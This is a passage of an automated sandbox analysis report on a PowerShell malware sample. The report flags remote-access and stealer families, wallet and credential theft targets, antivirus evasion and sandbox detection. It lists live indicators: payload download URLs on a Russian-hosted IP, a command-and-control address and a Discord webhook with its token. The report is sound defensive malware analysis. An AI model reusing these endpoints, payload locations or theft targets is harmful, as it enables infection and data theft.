            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Yara detected VenomRAT
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
            Source: RegAsm.exe, 0000000A.00000002.3702601081.00000000054CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected BrowserPasswordDump
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected DcRat
            Source: Yara matchFile source: 0000000A.00000002.3687725742.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected StormKitty Stealer
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected Strela Stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
            Source: powershell.exe, 00000000.00000002.1320587077.00007FFAAC6E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected BrowserPasswordDump
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected DcRat
            Source: Yara matchFile source: 0000000A.00000002.3687725742.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected StormKitty Stealer
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected Strela Stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		312
            Process Injection            		1
            Masquerading            		OS Credential Dumping241
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API            		Logon Script (Windows)1
            DLL Side-Loading            		151
            Virtualization/Sandbox Evasion            		Security Account Manager151
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive11
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Exploitation for Client Execution            		Login HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeylogging11
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
            Obfuscated Files or Information            		Cached Domain Credentials24
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582972 Sample: vfrcxq.ps1 Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 35 Suricata IDS alerts for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for dropped file 2->39 41 16 other signatures 2->41 7 powershell.exe 14 26 2->7         started        process3 dnsIp4 31 147.45.44.131, 49699, 80 FREE-NET-ASFREEnetEU Russian Federation 7->31 27 C:\Users\user\AppData\...\ewvozk4a.cmdline, Unicode 7->27 dropped 29 C:\Users\user\AppData\Local\...\ewvozk4a.0.cs, Unicode 7->29 dropped 43 Found many strings related to Crypto-Wallets (likely being stolen) 7->43 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->45 47 Writes to foreign memory regions 7->47 49 3 other signatures 7->49 12 RegAsm.exe 1 3 7->12         started        16 csc.exe 3 7->16         started        19 svchost.exe 1 7->19         started        21 conhost.exe 7->21         started        file5 signatures6 process7 dnsIp8 33 157.20.182.177, 4449, 49701 FCNUniversityPublicCorporationOsakaJP unknown 12->33 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->51 25 C:\Users\user\AppData\Local\...\ewvozk4a.dll, PE32 16->25 dropped 23 cvtres.exe 1 16->23         started        file9 signatures10 process11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            vfrcxq.ps113%ReversingLabsScript-PowerShell.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dll100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://147.45.H0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfdjo.exe0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/yijth.exeqqn0%Avira URL Cloudsafe
            http://147.45.440%Avira URL Cloudsafe
            http://147.45.44X0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/yijth.exe0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://147.45.44.131/infopage/vfdjo.exefalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://147.45.44.131/infopage/yijth.exeqqncsc.exe, 00000003.00000003.1254989145.000001B909BE2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1283601445.00000219ACFAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://147.45.Hpowershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD7A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://discordapp.com/api/v6/users/RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://urn.to/r/sds_seeaCouldpowershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://james.newtonking.com/projects/jsonRegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.newtonsoft.com/jsonschemapowershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      http://147.45.44.131powershell.exe, 00000000.00000002.1283601445.00000219AB777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://147.45.44.131/infopage/yijth.exepowershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1317858131.00000219C3AD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219AB9A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1254833761.000001B909BE2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1254910896.000001B909BD1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1255776264.000001B909D7B000.00000004.00001000.00020000.00000000.sdmp, ewvozk4a.0.cs.0.dr, ewvozk4a.dll.3.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://stackoverflow.com/q/14436606/23354cItpowershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://ipinfo.io/ippowershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/LimerBoy/StormKittypowershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219AB9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD82000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/2152978/23354powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1283601445.00000219ACFAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oneget.orgXpowershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1283601445.00000219AB551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://urn.to/r/sds_seepowershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1283601445.00000219AB551000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://147.45.44powershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://oneget.orgpowershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://147.45.44Xpowershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  147.45.44.131
                                                                  		unknownRussian Federation
                                                                  		2895FREE-NET-ASFREEnetEUfalse
                                                                  157.20.182.177
                                                                  		unknownunknown
                                                                  		24297FCNUniversityPublicCorporationOsakaJPtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1582972
                                                                  Start date and time:2025-01-01 08:53:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 43s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:17
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
